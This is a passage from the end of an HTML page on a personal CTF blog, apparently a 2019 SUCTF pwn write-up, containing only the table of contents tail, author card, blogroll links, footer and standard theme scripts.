        <a class="is-flex" href="#二手旧电脑">
        <span class="has-mr-6">3</span>
        <span>二手旧电脑</span>
        </a></li><li>
        <a class="is-flex" href="#sudrv">
        <span class="has-mr-6">4</span>
        <span>sudrv</span>
        </a></li></ul>
            </div>
        </div>
    </div>

    
        
<div class="card widget">
    <div class="card-content">
        <nav class="level">
            <div class="level-item has-text-centered" style="flex-shrink: 1">
                <div>
                    
                    <figure class="image is-128x128 has-mb-6">
                        <img class="" src="/images/avatar.png" alt="Mask">
                    </figure>
                    
                    <p class="is-size-4 is-block">
                        Mask
                    </p>
                    
                    
                    <p class="is-size-6 is-block">
                        A newbie in CTF
                    </p>
                    
                    
                </div>
            </div>
        </nav>
        <nav class="level is-mobile">
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        文章
                    </p>
                    <a href="/archives">
                        <p class="title has-text-weight-normal">
                            24
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        分类
                    </p>
                    <a href="/categories">
                        <p class="title has-text-weight-normal">
                            4
                        </p>
                    </a>
                </div>
            </div>
            <div class="level-item has-text-centered is-marginless">
                <div>
                    <p class="heading">
                        标签
                    </p>
                    <a href="/tags">
                        <p class="title has-text-weight-normal">
                            15
                        </p>
                    </a>
                </div>
            </div>
        </nav>
        
        
        
        <div class="level is-mobile">
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Github" href="https://github.com/mask6asok">
                
                <i class="fab fa-github"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="QQ" href="tencent://message/?uin=1924594189&amp;Site=&amp;menu=yes">
                
                <i class="fab fa-qq"></i>
                
            </a>
            
            <a class="level-item button is-white is-marginless" target="_blank" rel="noopener"
                title="Email" href="mailto:1924594189@qq.com">
                
                <i class="fa fa-envelope"></i>
                
            </a>
            
        </div>
        
    </div>
</div>
    
        <div class="card widget">
    <div class="card-content">
        <div class="menu">
        <h3 class="menu-label">
            链接
        </h3>
        <ul class="menu-list">
        
            <li>
                <a class="level is-mobile" href="https://binlep.github.io/" target="_blank" rel="noopener">
                    <span class="level-left">
                        <span class="level-item">binLep&#39;s blog</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">binlep.github.io</span>
                    </span>
                </a>
            </li>
        
            <li>
                <a class="level is-mobile" href="http://120.79.211.91/writeup-and-technology-sharing" target="_blank" rel="noopener">
                    <span class="level-left">
                        <span class="level-item">C0ss4ck&#39;s blog</span>
                    </span>
                    <span class="level-right">
                        <span class="level-item tag">120.79.211.91</span>
                    </span>
                </a>
            </li>
        
        </ul>
        </div>
    </div>
</div>

    
    
        <div class="column-right-shadow is-hidden-widescreen is-sticky">
        
        </div>
    
</div>

                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logo.ico" alt="2019 SUCTF PWN WP" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2020 Mask&nbsp;
                Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> & <a
                        href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a>
                
                </p>
            </div>
            <div class="level-end">
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>


<script>
var IcarusThemeSettings = {
    site: {
        url: 'http://mask6asok.top',
        external_link: {"enable":true,"exclude":[]}
    },
    article: {
        highlight: {
            clipboard: false,
            fold: ''
        }
    }
};
</script>






<script src="/js/animation.js"></script>



<script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
<script src="/js/gallery.js" defer></script>



<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>


<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>














<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>